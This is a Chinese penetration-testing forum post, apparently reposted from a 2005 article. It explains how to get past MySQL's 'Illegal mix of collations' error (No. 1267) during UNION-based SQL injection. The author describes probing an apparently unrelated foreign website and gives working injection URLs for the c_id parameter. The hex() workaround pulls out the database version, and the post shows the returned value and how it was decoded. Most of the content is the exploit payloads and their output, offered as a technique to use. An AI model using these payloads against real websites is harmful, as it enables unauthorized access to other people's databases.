找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MySQL注射时ErrorNo.1267的突破
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2372|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei3 q0 f) J4 j: x6 O
文章性质:原创3 @  r) ?0 l0 K$ U
发布日期:2005-10-18
" b" {" q+ \  J4 `5 ?测试个国外的站时:- N( C8 t' z8 S$ u3 i
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
) s9 q0 s9 Y- ~2 N' ~6 x6 y返回错误:
# g) ]7 _: x" U; GIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'& ]- x0 O: p0 Q6 d% C
MySQL Error No. 126
- \- A" c, V% R看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
- d5 @2 f' z; _& A2 [  V! Q' W! k解决办法:转为其他编码如hex。
, ?* K: w" b( T5 Jurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
5 g+ R+ I9 W' ]* X$ h成功得到hex(version())的值为:6 \, P/ B; p3 ]" W( X
342E312E332D62657461
: Q* }8 x* W" P# N4 X回Mysql查询下得到:
) i& L& I2 y) g& Lmysql> select 0x342E312E332D62657461;, a) o7 z- @3 V" U+ ]. p9 \
+------------------------+
' a' R- h$ `- S| 0x342E312E332D62657461 |' Y! S) g9 Q, P' T( I6 U
+------------------------+
2 {% g6 Z0 [7 S% P! n1 P2 B| 4.1.3-beta |& }  S( d+ Q6 r: L
+------------------------+  w( k' E- D' {: s
1 row in set (0.00 sec)
0 ~5 E" K+ T$ x
$ n( A; G0 g' I7 j+ o- |8 V5 A
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表